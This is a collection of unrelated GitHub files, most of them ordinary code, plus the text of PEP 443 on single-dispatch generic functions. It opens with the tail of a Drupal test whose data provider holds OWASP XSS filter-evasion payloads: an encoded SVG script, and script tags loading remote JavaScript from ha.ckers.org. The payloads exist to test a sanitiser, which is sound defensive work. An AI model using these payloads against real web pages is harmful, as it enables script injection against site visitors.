$data[] = ['<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', ''];
// XML data island with CDATA obfuscation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XML_data_island_with_CDATA_obfuscation
$data[] = ['<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '<XML id="xss"><I><B><IMG>cript:alert(\'XSS\')"></B></I></XML><SPAN datasrc="#xss" datafld="B" dataformatas="HTML"></SPAN>'];
// Locally hosted XML with embedded JavaScript that is generated using an XML data island.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Locally_hosted_XML_with_embedded_JavaScript_that_is_generated_using_an_XML_data_island
// This one is irrelevant for Drupal; Drupal disallows XML uploads by
// default.
// HTML+TIME in XML.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML.2BTIME_in_XML
$data[] = ['<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">', '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t set attributename="innerHTML">alert("XSS")">'];
// Assuming you can only fit in a few characters and it filters against ".js".
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Assuming_you_can_only_fit_in_a_few_characters_and_it_filters_against_.22.js.22
$data[] = ['<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>', ''];
// IMG Embedded commands.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Embedded_commands
// This one is irrelevant for Drupal; this is actually a CSRF, for which
// Drupal has CSRF protection. See https://www.drupal.org/node/178896.
// Cookie manipulation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Cookie_manipulation
$data[] = ['<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">', '<META http-equiv="Set-Cookie">alert(\'XSS\')">'];
// UTF-7 encoding.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-7_encoding
// This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.
// XSS using HTML quote encapsulation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#XSS_using_HTML_quote_encapsulation
$data[] = ['<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '" \'\' SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '\'" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '` SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT a=">\'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>', '\'>" SRC="http://ha.ckers.org/xss.js">'];
$data[] = ['<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>', 'document.write("<SCRI>PT SRC="http://ha.ckers.org/xss.js">'];
// URL string evasion.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#URL_string_evasion
// This one is irrelevant for Drupal; Drupal doesn't forbid linking to some
// sites, it only forbids linking to any protocols other than those that are
// whitelisted.
// Test XSS filtering on data-attributes.
// @see \Drupal\editor\EditorXssFilter::filterXssDataAttributes()
// The following two test cases verify that XSS attack vectors are filtered.
$data[] = ['<img src="butterfly.jpg" data-caption="<script>alert();</script>" />', '<img src="butterfly.jpg" data-caption="alert();" />'];
$data[] = ['<img src="butterfly.jpg" data-caption="<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>" />', '<img src="butterfly.jpg" data-caption="" />'];
// When including HTML-tags as visible content, they are double-escaped.
// This test case ensures that we leave that content unchanged.
$data[] = ['<img src="butterfly.jpg" data-caption="&lt;script&gt;alert();&lt;/script&gt;" />', '<img src="butterfly.jpg" data-caption="&lt;script&gt;alert();&lt;/script&gt;" />'];
return $data;
}
/**
* Tests the method for filtering XSS.
*
* @param string $input
* The input.
* @param string $expected_output
* The expected output.
*
* @dataProvider providerTestFilterXss
*/
public function testFilterXss($input, $expected_output) {
  // Run the editor XSS filter for the configured format and compare the
  // sanitized markup verbatim against the expectation.
  $this->assertSame($expected_output, Standard::filterXss($input, $this->format));
}
/**
* Tests removing disallowed tags and XSS prevention.
*
* \Drupal\Component\Utility\Xss::filter() has the ability to run in blacklist
* mode, in which it still applies the exact same filtering, with one
* exception: it no longer works with a list of allowed tags, but with a list
* of disallowed tags.
*
* @param string $value
* The value to filter.
* @param string $expected
* The string that is expected to be missing.
* @param string $message
* The assertion message to display upon failure.
* @param array $disallowed_tags
* (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
*
* @dataProvider providerTestBlackListMode
*/
public function testBlacklistMode($value, $expected, $message, array $disallowed_tags) {
  // Filter in blacklist mode (tags listed are stripped, everything else is
  // kept) and verify the sanitized output.
  $filtered = Standard::filter($value, $disallowed_tags);
  $this->assertSame($expected, $filtered, $message);
}
/**
* Data provider for testBlacklistMode().
*
* @see testBlacklistMode()
*
* @return array
* An array of arrays containing the following elements:
* - The value to filter.
* - The value to expect after filtering.
* - The assertion message.
* - (optional) The disallowed HTML tags to be passed to \Drupal\Component\Utility\Xss::filter().
*/
public function providerTestBlackListMode() {
  // Every case feeds the same attack string through the filter; only the
  // set of disallowed tags differs between cases.
  $input = '<unknown style="visibility:hidden">Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>';

  $cases = [];
  $cases[] = [
    $input,
    '<unknown>Pink Fairy Armadillo</unknown><video src="gerenuk.mp4">alert(0)',
    'Disallow only the script tag',
    ['script'],
  ];
  $cases[] = [
    $input,
    '<unknown>Pink Fairy Armadillo</unknown>alert(0)',
    'Disallow both the script and video tags',
    ['script', 'video'],
  ];
  // No real use case for this, but it is an edge case we must ensure works.
  $cases[] = [
    $input,
    '<unknown>Pink Fairy Armadillo</unknown><video src="gerenuk.mp4"><script>alert(0)</script>',
    'Disallow no tags',
    [],
  ];
  return $cases;
}
}
| {
"pile_set_name": "Github"
} |
/**
* Header comment
*/
const one = require('one');
/**
* Function description.
*/
/**
 * Invokes the imported `one` helper exactly once.
 */
function foo() {
  one();
}
| {
"pile_set_name": "Github"
} |
# Add issue_backlog table
# One row per user; `issues` stores an opaque serialized blob of that user's
# issue backlog.  The foreign key cascades, so backlog rows follow the owning
# `user` row on update and are removed when the user is deleted.
CREATE TABLE `issue_backlog`(
  `id` INT UNSIGNED NOT NULL AUTO_INCREMENT,
  `user_id` INT UNSIGNED NOT NULL,
  `issues` BLOB NOT NULL,
  PRIMARY KEY (`id`),
  CONSTRAINT `issue_backlog_user_id` FOREIGN KEY (`user_id`) REFERENCES `user`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
) ENGINE=INNODB CHARSET=utf8;

# Update version
# Bump the stored schema/application version marker for this migration.
UPDATE `config` SET `value` = '16.02.04.1' WHERE `attribute` = 'version';
| {
"pile_set_name": "Github"
} |
/* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.plugins.importer.batch;
import ghidra.formats.gfilesystem.FSRL;
/**
* This class holds information regarding a single user-added source file added
* to a batch import session.
*/
/**
 * This class holds information regarding a single user-added source file added
 * to a batch import session.
 * <p>
 * Instances are simple mutable counters/flags accumulated while the batch
 * importer scans the source.
 */
public class UserAddedSourceInfo {
	private final FSRL fsrl;
	private int fileCount;
	private int rawFileCount;
	private int containerCount;
	private int maxNestLevel;
	private boolean recurseTerminatedEarly;

	/**
	 * Creates an info record for the given source location.
	 *
	 * @param fsrl location of the user-added source file
	 */
	UserAddedSourceInfo(FSRL fsrl) {
		this.fsrl = fsrl;
	}

	/**
	 * @return the file count accumulated for this source
	 */
	public int getFileCount() {
		return fileCount;
	}

	/**
	 * Sets the file count for this source.
	 *
	 * @param fileCount new file count
	 */
	public void setFileCount(int fileCount) {
		this.fileCount = fileCount;
	}

	/**
	 * Increments the file count by one.  Provided for consistency with
	 * {@link #incRawFileCount()} and {@link #incContainerCount()}.
	 */
	public void incFileCount() {
		this.fileCount++;
	}

	/**
	 * @return the raw file count accumulated for this source
	 */
	public int getRawFileCount() {
		return rawFileCount;
	}

	/**
	 * Sets the raw file count for this source.
	 *
	 * @param rawFileCount new raw file count
	 */
	public void setRawFileCount(int rawFileCount) {
		this.rawFileCount = rawFileCount;
	}

	/**
	 * Increments the raw file count by one.
	 */
	public void incRawFileCount() {
		this.rawFileCount++;
	}

	/**
	 * @return the container count accumulated for this source
	 */
	public int getContainerCount() {
		return containerCount;
	}

	/**
	 * Sets the container count for this source.
	 *
	 * @param containerCount new container count
	 */
	public void setContainerCount(int containerCount) {
		this.containerCount = containerCount;
	}

	/**
	 * Increments the container count by one.
	 */
	public void incContainerCount() {
		this.containerCount++;
	}

	/**
	 * @return the maximum nesting level recorded for this source
	 */
	public int getMaxNestLevel() {
		return maxNestLevel;
	}

	/**
	 * Sets the maximum nesting level recorded for this source.
	 *
	 * @param maxNestLevel new maximum nesting level
	 */
	public void setMaxNestLevel(int maxNestLevel) {
		this.maxNestLevel = maxNestLevel;
	}

	/**
	 * @return true if the recursive scan of this source was terminated early
	 */
	public boolean wasRecurseTerminatedEarly() {
		return recurseTerminatedEarly;
	}

	/**
	 * Sets whether the recursive scan of this source was terminated early.
	 *
	 * @param recurseTerminatedEarly true if recursion stopped before completion
	 */
	public void setRecurseTerminatedEarly(boolean recurseTerminatedEarly) {
		this.recurseTerminatedEarly = recurseTerminatedEarly;
	}

	/**
	 * @return the location of the user-added source file
	 */
	public FSRL getFSRL() {
		return fsrl;
	}
}
| {
"pile_set_name": "Github"
} |
require 'spaceship'
require_relative 'module'
module Produce
  # Creates iCloud Containers on the Apple Developer Portal (via Spaceship)
  # and associates them with an existing app identifier.
  class CloudContainer
    # Ensures an iCloud Container with the requested identifier exists on the
    # Developer Portal, creating it when missing.  Always returns true.
    def create(options, _args)
      login

      container_identifier = options.container_identifier || UI.input("iCloud Container identifier: ")

      if container_exists?(container_identifier)
        UI.success("[DevCenter] iCloud Container '#{options.container_name} (#{options.container_identifier})' already exists, nothing to do on the Dev Center")
        # Nothing to do here
      else
        # Fall back to a human-readable name derived from the identifier.
        container_name = options.container_name || container_identifier.gsub('.', ' ')

        UI.success("Creating new iCloud Container '#{container_name}' with identifier '#{container_identifier}' on the Apple Dev Center")

        container = Spaceship.cloud_container.create!(identifier: container_identifier, name: container_name)

        # The portal rejects non-ASCII names; Spaceship substitutes a unique
        # ASCII-safe internal name in that case.
        if container.name != container_name
          UI.important("Your container name includes non-ASCII characters, which are not supported by the Apple Developer Portal.")
          UI.important("To fix this a unique (internal) name '#{container.name}' has been created for you.")
        end

        UI.message("Created iCloud Container #{container.cloud_container}")
        # Re-query the portal to confirm the container actually appears.
        UI.user_error!("Something went wrong when creating the new iCloud Container - it's not listed in the iCloud Container list") unless container_exists?(container_identifier)

        UI.success("Finished creating new iCloud Container '#{container_name}' on the Dev Center")
      end

      return true
    end

    # Associates the container identifiers given in +args+ with the app
    # configured via Produce.config.  Identifiers whose containers do not
    # exist yet are skipped with a message.  Always returns true.
    def associate(_options, args)
      login

      if !app_exists?
        UI.message("[DevCenter] App '#{Produce.config[:app_identifier]}' does not exist, nothing to associate with the containers")
      else
        app = Spaceship.app.find(app_identifier)
        UI.user_error!("Something went wrong when fetching the app - it's not listed in the apps list") if app.nil?

        new_containers = []

        UI.message("Validating containers before association")

        args.each do |container_identifier|
          if !container_exists?(container_identifier)
            UI.message("[DevCenter] iCloud Container '#{container_identifier}' does not exist, please create it first, skipping for now")
          else
            new_containers.push(Spaceship.cloud_container.find(container_identifier))
          end
        end

        UI.message("Finalising association with #{new_containers.count} containers")
        app.associate_cloud_containers(new_containers)
        UI.success("Done!")
      end

      return true
    end

    # Logs in to the Developer Portal with the configured username and
    # selects the team to operate on.
    def login
      UI.message("Starting login with user '#{Produce.config[:username]}'")
      # Password is nil here; Spaceship resolves credentials itself
      # (keychain/env) -- TODO confirm against Spaceship.login docs.
      Spaceship.login(Produce.config[:username], nil)
      Spaceship.select_team
      UI.message("Successfully logged in")
    end

    # The configured app identifier, coerced to a String.
    def app_identifier
      Produce.config[:app_identifier].to_s
    end

    # True if a cloud container with the given identifier exists on the portal.
    def container_exists?(identifier)
      Spaceship.cloud_container.find(identifier) != nil
    end

    # True if the configured app identifier exists on the portal.
    def app_exists?
      Spaceship.app.find(app_identifier) != nil
    end
  end
end
"pile_set_name": "Github"
} |
//
// LLCollectionEmotionTip.h
// LLWeChat
//
// Created by GYJZH on 7/30/16.
// Copyright © 2016 GYJZH. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "LLCollectionEmotionCell.h"
// Floating tip view shown for an emoji collection cell.  Obtain the single
// shared instance via +sharedTip.
@interface LLCollectionEmojiTip : UIView

// The emoji cell the tip is currently attached to.
@property (nonatomic) LLCollectionEmojiCell *cell;

// Returns the shared singleton tip instance.
+ (instancetype)sharedTip;

// Shows the tip anchored to the given cell.
- (void)showTipOnCell:(LLCollectionEmojiCell *)cell;

@end
// Floating tip view shown for a GIF collection cell.  Obtain the single
// shared instance via +sharedTip.
@interface LLCollectionGifTip : UIView

// The GIF cell the tip is currently attached to.
@property (nonatomic) LLCollectionGifCell *cell;

// Returns the shared singleton tip instance.
+ (instancetype)sharedTip;

// Shows the tip anchored to the given cell.
- (void)showTipOnCell:(LLCollectionGifCell *)cell;

@end
"pile_set_name": "Github"
} |
import { Component, OnInit } from '@angular/core';
@Component({
selector: 'register-v2',
templateUrl: './register-v2.component.html',
styleUrls: ['./register-v2.component.scss']
})
export class RegisterV2Component implements OnInit {
constructor() {}
ngOnInit() {
}
}
| {
"pile_set_name": "Github"
} |
/*
* Generated by class-dump 3.3.4 (64 bit).
*
* class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2011 by Steve Nygard.
*/
#import "NSObject.h"
#import "OCDDelayedMediaContext-Protocol.h"
@class NSURL, OCPPackage;
// NOTE(review): this header was generated by class-dump; argument names are
// lost, so the notes below are inferred from selector names — confirm against
// the implementation before relying on them.
@interface OCXDelayedMediaContext : NSObject <OCDDelayedMediaContext>
{
    OCPPackage *mPackage;        // package the delayed media belongs to — TODO confirm
    NSURL *mTargetLocation;      // target location the context was created with — TODO confirm
}

- (_Bool)saveDelayedMedia:(id)arg1 toFile:(id)arg2;
- (_Bool)loadDelayedNode:(id)arg1;
- (void)dealloc;
- (id)initWithTargetLocation:(id)arg1 package:(id)arg2;

@end
| {
"pile_set_name": "Github"
} |
namespace Api.Customers
{
    /// <summary>
    /// Lightweight data-transfer representation of a movie.
    /// </summary>
    public class MovieDto
    {
        /// <summary>Unique identifier of the movie.</summary>
        public long Id { get; set; }

        /// <summary>Display name of the movie.</summary>
        public string Name { get; set; }
    }
}
"pile_set_name": "Github"
} |
PEP: 443
Title: Single-dispatch generic functions
Version: $Revision$
Last-Modified: $Date$
Author: Łukasz Langa <[email protected]>
Discussions-To: Python-Dev <[email protected]>
Status: Final
Type: Standards Track
Content-Type: text/x-rst
Created: 22-May-2013
Post-History: 22-May-2013, 25-May-2013, 31-May-2013
Replaces: 245, 246, 3124
Abstract
========
This PEP proposes a new mechanism in the ``functools`` standard library
module that provides a simple form of generic programming known as
single-dispatch generic functions.
A **generic function** is composed of multiple functions implementing
the same operation for different types. Which implementation should be
used during a call is determined by the dispatch algorithm. When the
implementation is chosen based on the type of a single argument, this is
known as **single dispatch**.
Rationale and Goals
===================
Python has always provided a variety of built-in and standard-library
generic functions, such as ``len()``, ``iter()``, ``pprint.pprint()``,
``copy.copy()``, and most of the functions in the ``operator`` module.
However, it currently:
1. does not have a simple or straightforward way for developers to
create new generic functions,
2. does not have a standard way for methods to be added to existing
generic functions (i.e., some are added using registration
functions, others require defining ``__special__`` methods, possibly
by monkeypatching).
In addition, it is currently a common anti-pattern for Python code to
inspect the types of received arguments, in order to decide what to do
with the objects.
For example, code may wish to accept either an object
of some type, or a sequence of objects of that type.
Currently, the "obvious way" to do this is by type inspection, but this
is brittle and closed to extension.
Abstract Base Classes make it easier
to discover present behaviour, but don't help adding new behaviour.
A developer using an already-written library may be unable to change how
their objects are treated by such code, especially if the objects they
are using were created by a third party.
Therefore, this PEP proposes a uniform API to address dynamic
overloading using decorators.
User API
========
To define a generic function, decorate it with the ``@singledispatch``
decorator. Note that the dispatch happens on the type of the first
argument. Create your function accordingly::
>>> from functools import singledispatch
>>> @singledispatch
... def fun(arg, verbose=False):
... if verbose:
... print("Let me just say,", end=" ")
... print(arg)
To add overloaded implementations to the function, use the
``register()`` attribute of the generic function. This is a decorator,
taking a type parameter and decorating a function implementing the
operation for that type::
>>> @fun.register(int)
... def _(arg, verbose=False):
... if verbose:
... print("Strength in numbers, eh?", end=" ")
... print(arg)
...
>>> @fun.register(list)
... def _(arg, verbose=False):
... if verbose:
... print("Enumerate this:")
... for i, elem in enumerate(arg):
... print(i, elem)
To enable registering lambdas and pre-existing functions, the
``register()`` attribute can be used in a functional form::
>>> def nothing(arg, verbose=False):
... print("Nothing.")
...
>>> fun.register(type(None), nothing)
The ``register()`` attribute returns the undecorated function. This
enables decorator stacking, pickling, as well as creating unit tests for
each variant independently::
>>> @fun.register(float)
... @fun.register(Decimal)
... def fun_num(arg, verbose=False):
... if verbose:
... print("Half of your number:", end=" ")
... print(arg / 2)
...
>>> fun_num is fun
False
When called, the generic function dispatches on the type of the first
argument::
>>> fun("Hello, world.")
Hello, world.
>>> fun("test.", verbose=True)
Let me just say, test.
>>> fun(42, verbose=True)
Strength in numbers, eh? 42
>>> fun(['spam', 'spam', 'eggs', 'spam'], verbose=True)
Enumerate this:
0 spam
1 spam
2 eggs
3 spam
>>> fun(None)
Nothing.
>>> fun(1.23)
0.615
Where there is no registered implementation for a specific type, its
method resolution order is used to find a more generic implementation.
The original function decorated with ``@singledispatch`` is registered
for the base ``object`` type, which means it is used if no better
implementation is found.
To check which implementation the generic function will choose for
a given type, use the ``dispatch()`` attribute::
>>> fun.dispatch(float)
<function fun_num at 0x104319058>
>>> fun.dispatch(dict) # note: default implementation
<function fun at 0x103fe0000>
To access all registered implementations, use the read-only ``registry``
attribute::
>>> fun.registry.keys()
dict_keys([<class 'NoneType'>, <class 'int'>, <class 'object'>,
<class 'decimal.Decimal'>, <class 'list'>,
<class 'float'>])
>>> fun.registry[float]
<function fun_num at 0x1035a2840>
>>> fun.registry[object]
<function fun at 0x103fe0000>
The proposed API is intentionally limited and opinionated, as to ensure
it is easy to explain and use, as well as to maintain consistency with
existing members in the ``functools`` module.
Implementation Notes
====================
The functionality described in this PEP is already implemented in the
``pkgutil`` standard library module as ``simplegeneric``. Because this
implementation is mature, the goal is to move it largely as-is. The
reference implementation is available on hg.python.org [#ref-impl]_.
The dispatch type is specified as a decorator argument. An alternative
form using function annotations was considered but its inclusion
has been rejected. As of May 2013, this usage pattern is out of scope
for the standard library [#pep-0008]_, and the best practices for
annotation usage are still debated.
Based on the current ``pkgutil.simplegeneric`` implementation, and
following the convention on registering virtual subclasses on Abstract
Base Classes, the dispatch registry will not be thread-safe.
Abstract Base Classes
---------------------
The ``pkgutil.simplegeneric`` implementation relied on several forms of
method resolution order (MRO). ``@singledispatch`` removes special
handling of old-style classes and Zope's ExtensionClasses. More
importantly, it introduces support for Abstract Base Classes (ABC).
When a generic function implementation is registered for an ABC, the
dispatch algorithm switches to an extended form of C3 linearization,
which includes the relevant ABCs in the MRO of the provided argument.
The algorithm inserts ABCs where their functionality is introduced, i.e.
``issubclass(cls, abc)`` returns ``True`` for the class itself but
returns ``False`` for all its direct base classes. Implicit ABCs for
a given class (either registered or inferred from the presence of
a special method like ``__len__()``) are inserted directly after the
last ABC explicitly listed in the MRO of said class.
In its most basic form, this linearization returns the MRO for the given
type::
>>> _compose_mro(dict, [])
[<class 'dict'>, <class 'object'>]
When the second argument contains ABCs that the specified type is
a subclass of, they are inserted in a predictable order::
>>> _compose_mro(dict, [Sized, MutableMapping, str,
... Sequence, Iterable])
[<class 'dict'>, <class 'collections.abc.MutableMapping'>,
<class 'collections.abc.Mapping'>, <class 'collections.abc.Sized'>,
<class 'collections.abc.Iterable'>, <class 'collections.abc.Container'>,
<class 'object'>]
While this mode of operation is significantly slower, all dispatch
decisions are cached. The cache is invalidated on registering new
implementations on the generic function or when user code calls
``register()`` on an ABC to implicitly subclass it. In the latter case,
it is possible to create a situation with ambiguous dispatch, for
instance::
>>> from collections import Iterable, Container
>>> class P:
... pass
>>> Iterable.register(P)
<class '__main__.P'>
>>> Container.register(P)
<class '__main__.P'>
Faced with ambiguity, ``@singledispatch`` refuses the temptation to
guess::
>>> @singledispatch
... def g(arg):
... return "base"
...
>>> g.register(Iterable, lambda arg: "iterable")
<function <lambda> at 0x108b49110>
>>> g.register(Container, lambda arg: "container")
<function <lambda> at 0x108b491c8>
>>> g(P())
Traceback (most recent call last):
...
RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
or <class 'collections.abc.Iterable'>
Note that this exception would not be raised if one or more ABCs had
been provided explicitly as base classes during class definition. In
this case dispatch happens in the MRO order::
>>> class Ten(Iterable, Container):
... def __iter__(self):
... for i in range(10):
... yield i
... def __contains__(self, value):
... return value in range(10)
...
>>> g(Ten())
'iterable'
A similar conflict arises when subclassing an ABC is inferred from the
presence of a special method like ``__len__()`` or ``__contains__()``::
>>> class Q:
... def __contains__(self, value):
... return False
...
>>> issubclass(Q, Container)
True
>>> Iterable.register(Q)
>>> g(Q())
Traceback (most recent call last):
...
RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
or <class 'collections.abc.Iterable'>
An early version of the PEP contained a custom approach that was simpler
but created a number of edge cases with surprising results [#why-c3]_.
Usage Patterns
==============
This PEP proposes extending behaviour only of functions specifically
marked as generic. Just as a base class method may be overridden by
a subclass, so too a function may be overloaded to provide custom
functionality for a given type.
Universal overloading does not equal *arbitrary* overloading, in the
sense that we need not expect people to randomly redefine the behavior
of existing functions in unpredictable ways. To the contrary, generic
function usage in actual programs tends to follow very predictable
patterns and registered implementations are highly-discoverable in the
common case.
If a module is defining a new generic operation, it will usually also
define any required implementations for existing types in the same
place. Likewise, if a module is defining a new type, then it will
usually define implementations there for any generic functions that it
knows or cares about. As a result, the vast majority of registered
implementations can be found adjacent to either the function being
overloaded, or to a newly-defined type for which the implementation is
adding support.
It is only in rather infrequent cases that one will have implementations
registered in a module that contains neither the function nor the
type(s) for which the implementation is added. In the absence of
incompetence or deliberate intention to be obscure, the few
implementations that are not registered adjacent to the relevant type(s)
or function(s), will generally not need to be understood or known about
outside the scope where those implementations are defined. (Except in
the "support modules" case, where best practice suggests naming them
accordingly.)
As mentioned earlier, single-dispatch generics are already prolific
throughout the standard library. A clean, standard way of doing them
provides a way forward to refactor those custom implementations to use
a common one, opening them up for user extensibility at the same time.
Alternative approaches
======================
In PEP 3124 [#pep-3124]_ Phillip J. Eby proposes a full-grown solution
with overloading based on arbitrary rule sets (with the default
implementation dispatching on argument types), as well as interfaces,
adaptation and method combining. PEAK-Rules [#peak-rules]_ is
a reference implementation of the concepts described in PJE's PEP.
Such a broad approach is inherently complex, which makes reaching
a consensus hard. In contrast, this PEP focuses on a single piece of
functionality that is simple to reason about. It's important to note
this does not preclude the use of other approaches now or in the future.
In a 2005 article on Artima [#artima2005]_ Guido van Rossum presents
a generic function implementation that dispatches on types of all
arguments on a function. The same approach was chosen in Andrey Popp's
``generic`` package available on PyPI [#pypi-generic]_, as well as David
Mertz's ``gnosis.magic.multimethods`` [#gnosis-multimethods]_.
While this seems desirable at first, I agree with Fredrik Lundh's
comment that "if you design APIs with pages of logic just to sort out
what code a function should execute, you should probably hand over the
API design to someone else". In other words, the single argument
approach proposed in this PEP is not only easier to implement but also
clearly communicates that dispatching on a more complex state is an
anti-pattern. It also has the virtue of corresponding directly with the
familiar method dispatch mechanism in object oriented programming. The
only difference is whether the custom implementation is associated more
closely with the data (object-oriented methods) or the algorithm
(single-dispatch overloading).
PyPy's RPython offers ``extendabletype`` [#pairtype]_, a metaclass which
enables classes to be externally extended. In combination with
``pairtype()`` and ``pair()`` factories, this offers a form of
single-dispatch generics.
Acknowledgements
================
Apart from Phillip J. Eby's work on PEP 3124 [#pep-3124]_ and
PEAK-Rules, influences include Paul Moore's original issue
[#issue-5135]_ that proposed exposing ``pkgutil.simplegeneric`` as part
of the ``functools`` API, Guido van Rossum's article on multimethods
[#artima2005]_, and discussions with Raymond Hettinger on a general
pprint rewrite. Huge thanks to Nick Coghlan for encouraging me to create
this PEP and providing initial feedback.
References
==========
.. [#ref-impl]
http://hg.python.org/features/pep-443/file/tip/Lib/functools.py#l359
.. [#pep-0008] PEP 8 states in the "Programming Recommendations"
section that "the Python standard library will not use function
annotations as that would result in a premature commitment to
a particular annotation style".
(http://www.python.org/dev/peps/pep-0008)
.. [#why-c3] http://bugs.python.org/issue18244
.. [#pep-3124] http://www.python.org/dev/peps/pep-3124/
.. [#peak-rules] http://peak.telecommunity.com/DevCenter/PEAK_2dRules
.. [#artima2005]
http://www.artima.com/weblogs/viewpost.jsp?thread=101605
.. [#pypi-generic] http://pypi.python.org/pypi/generic
.. [#gnosis-multimethods]
http://gnosis.cx/publish/programming/charming_python_b12.html
.. [#pairtype]
https://bitbucket.org/pypy/pypy/raw/default/rpython/tool/pairtype.py
.. [#issue-5135] http://bugs.python.org/issue5135
Copyright
=========
This document has been placed in the public domain.
..
Local Variables:
mode: indented-text
indent-tabs-mode: nil
sentence-end-double-space: t
fill-column: 70
coding: utf-8
End:
| {
"pile_set_name": "Github"
} |
# go-isatty
[](http://godoc.org/github.com/mattn/go-isatty)
[](https://travis-ci.org/mattn/go-isatty)
[](https://coveralls.io/github/mattn/go-isatty?branch=master)
[](https://goreportcard.com/report/mattn/go-isatty)
A Go implementation of isatty: reports whether a file descriptor refers to a terminal.
## Usage
```go
package main
import (
"fmt"
"github.com/mattn/go-isatty"
"os"
)
func main() {
if isatty.IsTerminal(os.Stdout.Fd()) {
fmt.Println("Is Terminal")
} else if isatty.IsCygwinTerminal(os.Stdout.Fd()) {
fmt.Println("Is Cygwin/MSYS2 Terminal")
} else {
fmt.Println("Is Not Terminal")
}
}
```
## Installation
```
$ go get github.com/mattn/go-isatty
```
## License
MIT
## Author
Yasuhiro Matsumoto (a.k.a mattn)
## Thanks
* k-takata: base idea for IsCygwinTerminal
https://github.com/k-takata/go-iscygpty
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" ?>
<ExportAPERO>
<CalibrationInternConique>
<KnownConv>eConvApero_DistM2C</KnownConv>
<PP>2790.43968930248366 1874.43294208992393</PP>
<F>5590.3522889788419</F>
<SzIm>5634 3754</SzIm>
<CalibDistortion>
<ModRad>
<CDist>2801.56088525157884 1891.83459885383377</CDist>
<CoeffDist>-2.77277807738007844e-09</CoeffDist>
<CoeffDist>1.1595700887045599e-16</CoeffDist>
<CoeffDist>-6.45038082158591678e-25</CoeffDist>
</ModRad>
</CalibDistortion>
</CalibrationInternConique>
</ExportAPERO>
| {
"pile_set_name": "Github"
} |
/*
* Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH under
* one or more contributor license agreements. See the NOTICE file distributed
* with this work for additional information regarding copyright ownership.
* Licensed under the Zeebe Community License 1.0. You may not use this file
* except in compliance with the Zeebe Community License 1.0.
*/
package io.zeebe.engine.processing.deployment.model.yaml;
import com.fasterxml.jackson.annotation.JsonProperty;
/**
 * Jackson-mapped POJO for one "case" entry of a YAML workflow definition.
 *
 * <p>The YAML keys {@code case}, {@code goto} and {@code default} are Java
 * keywords, so {@link JsonProperty} maps them onto the legal field names
 * {@code condition}, {@code next} and {@code defaultCase}.
 */
public final class YamlCase {

  /** Value of the YAML "case" key; defaults to the empty string. */
  @JsonProperty("case")
  private String condition = "";

  /** Value of the YAML "goto" key; defaults to the empty string. */
  @JsonProperty("goto")
  private String next = "";

  /** Value of the YAML "default" key; {@code null} when the key is absent. */
  @JsonProperty("default")
  private String defaultCase;

